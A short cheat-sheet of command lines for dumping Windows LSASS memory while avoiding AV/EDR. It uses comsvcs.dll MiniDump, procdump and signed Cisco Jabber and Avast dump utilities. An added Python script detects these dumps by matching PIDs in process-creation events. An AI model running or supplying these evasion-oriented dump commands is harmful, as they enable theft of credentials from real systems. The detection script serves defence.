
A few techniques for dumping LSASS memory while avoiding AV or EDR detection

rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"

procdump: pass the <process id> instead of the word lsass

Signed executables that can also be used:

CiscoJabber : CiscoJabberProcessDump.exe (ps lsass).id c:\temp\lsass.dmp

See original article :

Avast Dumper : AvDump.exe --pid 676 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file E:\lsass.dmp --min_interval 0

See original article :
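Because every command above passes a PID rather than the word lsass, detection has to resolve the PID argument against the host's lsass.exe PID instead of matching on the name. The following is an added example, not code from the original article: the host name WS01, the event field names and the use of 676 as the lsass PID are constructed assumptions.

```python
import re

# Each regex captures the PID that a dump tool named on the page was pointed at.
RULES = {
    "comsvcs_minidump": re.compile(r"comsvcs\.dll\W+MiniDump\W+(\d+)", re.I),
    "procdump_pid": re.compile(r"\bprocdump(?:64)?(?:\.exe)?\b.*?\s(\d+)(?:\s|$)", re.I),
    "jabber_processdump": re.compile(r"CiscoJabberProcessDump\.exe\W+(\d+)", re.I),
    "avdump_pid": re.compile(r"AvDump\.exe\b.*?--pid\s+(\d+)", re.I),
}

# Constructed process inventory and process-creation events (not real telemetry).
# In a real log, "(ps lsass).id" has already been expanded to a number by PowerShell.
LSASS_PIDS = {"WS01": 676}
SAMPLE_EVENTS = [
    {"host": "WS01", "cmdline": r'rundll32 C:\windows\system32\comsvcs.dll MiniDump "676 dump.bin full"'},
    {"host": "WS01", "cmdline": r"procdump 676"},
    {"host": "WS01", "cmdline": r"CiscoJabberProcessDump.exe 676 c:\temp\lsass.dmp"},
    {"host": "WS01", "cmdline": r"AvDump.exe --pid 676 --exception_ptr 0 --thread_id 0 "
                                r"--dump_level 1 --dump_file E:\lsass.dmp --min_interval 0"},
    {"host": "WS01", "cmdline": r"procdump 4321"},  # dump of another process, not lsass
    {"host": "WS01", "cmdline": r"rundll32 C:\windows\system32\shell32.dll,Control_RunDLL"},
]


def find_lsass_dumps(events, lsass_pids):
    """Return (host, rule) for events whose dump target PID is that host's lsass.exe."""
    hits = []
    for ev in events:
        for rule, rx in RULES.items():
            m = rx.search(ev["cmdline"])
            if m and int(m.group(1)) == lsass_pids.get(ev["host"]):
                hits.append((ev["host"], rule))
    return hits


def naive_name_match(events):
    """Name-based rule for comparison: only fires if 'lsass' appears in the command line."""
    return [ev for ev in events if "lsass" in ev["cmdline"].lower()]


if __name__ == "__main__":
    for host, rule in find_lsass_dumps(SAMPLE_EVENTS, LSASS_PIDS):
        print(f"ALERT {host}: {rule}")
    # The naive rule only catches events whose output file happens to be named lsass.dmp.
    print("naive matches:", len(naive_name_match(SAMPLE_EVENTS)))
```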